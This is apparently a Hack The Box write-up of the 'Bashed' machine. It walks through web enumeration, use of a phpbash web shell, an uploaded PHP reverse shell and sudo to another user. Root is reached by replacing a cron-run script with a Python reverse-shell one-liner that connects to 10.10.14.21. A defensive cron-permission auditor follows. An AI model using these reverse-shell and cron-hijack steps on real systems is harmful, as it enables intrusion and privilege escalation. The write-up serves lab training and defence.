Bashed
HTB 8. Bashed
1. `nmap -A -T4 -p- 10.10.10.68` shows port 80 with `Apache httpd 2.4.18 (Ubuntu)`.
2. `searchsploit apache 2.4` reveals a local `apache_ctl` exploit.
3. Going to the website `10.10.10.68` and looking at the content shows that `10.10.10.68/uploads` exists.
4. `dirbuster` time with the medium wordlist, which reveals several folders.
5. Viewing the source code of the pages shows nothing.
6. `dirbuster` found `dev/phpbash.php`.
7. Go to `10.10.10.68` and launch `phpbash.php`, which launches a web terminal.
8. `whoami` is `www-data`, so let's get the user flag: `cat /home/arrexel/user.txt`.
9. Test `sudo -l` and `history`, which shows we can become the `scriptmanager` user without a password.
10. Can't change to `scriptmanager` because we are in a webshell without a tty.
11. `cd /var/www/html/uploads/` and upload the payload.
13. Edit the `$ip` and `$port` to our IP and port `1234`.
14. Start a web server with `python -m SimpleHTTPServer 80` and run `wget http://10.10.14.21/rev.php` on the target.
15. Start netcat: `nc -nvlp 1234`.
16. Go to `10.10.10.68/uploads/rev.php` to execute and connect.
18. Just go down the list and try the options. Try `python -c 'import pty; pty.spawn("/bin/bash")'` and now we are in `bash`.
19. `sudo su scriptmanager` does not work, so let's try running a command as the user: `sudo -u scriptmanager /bin/bash`.
20. `whoami` is `scriptmanager` and `history` is none.
21. `ls -la /` shows `scriptmanager` owns `/scripts`.
22. `cd scripts` and `ls -la` shows `test.py` and `test.txt`.
23. The modified time of `test.txt` changes every minute, so a cronjob is running `test.py` every minute as root. Let's change `test.py` so it performs malicious actions.
25. Use `import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);` (`-i` is interactive mode) and download it to the target.
26. Start listening with `nc -nvlp 2345` and wait for the shell.
Someone exploited it with `CVE-2017-16995`, found after running the `linux-exploit-suggester`.
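Step 23 works because root's cron job runs a script from a directory that a non-root account owns. The following is an added example, not part of the original writeup: a Python check that lists every path in a cron command that an account outside a trusted set could modify or replace. The function names, the trusted-UID default and the sample crontab line are assumptions.

```python
import os
import re
import stat
from pathlib import Path

def cron_command_paths(line):
    """Absolute paths named in the command part of a user-crontab line."""
    fields = line.split(None, 5)  # five schedule fields, then the command
    if line.lstrip().startswith("#") or len(fields) < 6:
        return []
    return re.findall(r"(?<!\S)/[^\s;|&'\"]+", fields[5])

def untrusted_writers(path, trusted_uids=frozenset({0}), stop_at="/"):
    """List (path, reason) for the target and every ancestor directory up to
    stop_at that an account outside trusted_uids could modify or replace."""
    findings = []
    current, stop = Path(path).resolve(), Path(stop_at).resolve()
    while True:
        st = current.stat()
        # A sticky world-writable directory (like /tmp) protects other users' entries.
        sticky_dir = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
        if st.st_uid not in trusted_uids:
            findings.append((str(current), f"owned by uid {st.st_uid}"))
        if st.st_mode & stat.S_IWOTH and not sticky_dir:
            findings.append((str(current), "world-writable"))
        if current == stop or current == current.parent:
            return findings
        current = current.parent

def audit_cron_line(line, trusted_uids=frozenset({0}), stop_at="/"):
    """Map each existing path in a cron command to its findings."""
    report = {}
    for p in cron_command_paths(line):
        if os.path.exists(p):
            hits = untrusted_writers(p, trusted_uids, stop_at)
            if hits:
                report[p] = hits
    return report

if __name__ == "__main__":
    # Constructed sample line; the box's real root crontab is not shown on this page.
    sample = "* * * * * /usr/bin/python /scripts/test.py"
    for path, hits in audit_cron_line(sample).items():
        for where, why in hits:
            print(f"{path}: {where} is {why}")
```

Any finding on a path that root's cron executes means the job should be moved to a root-owned, non-writable location or run as the unprivileged owner instead.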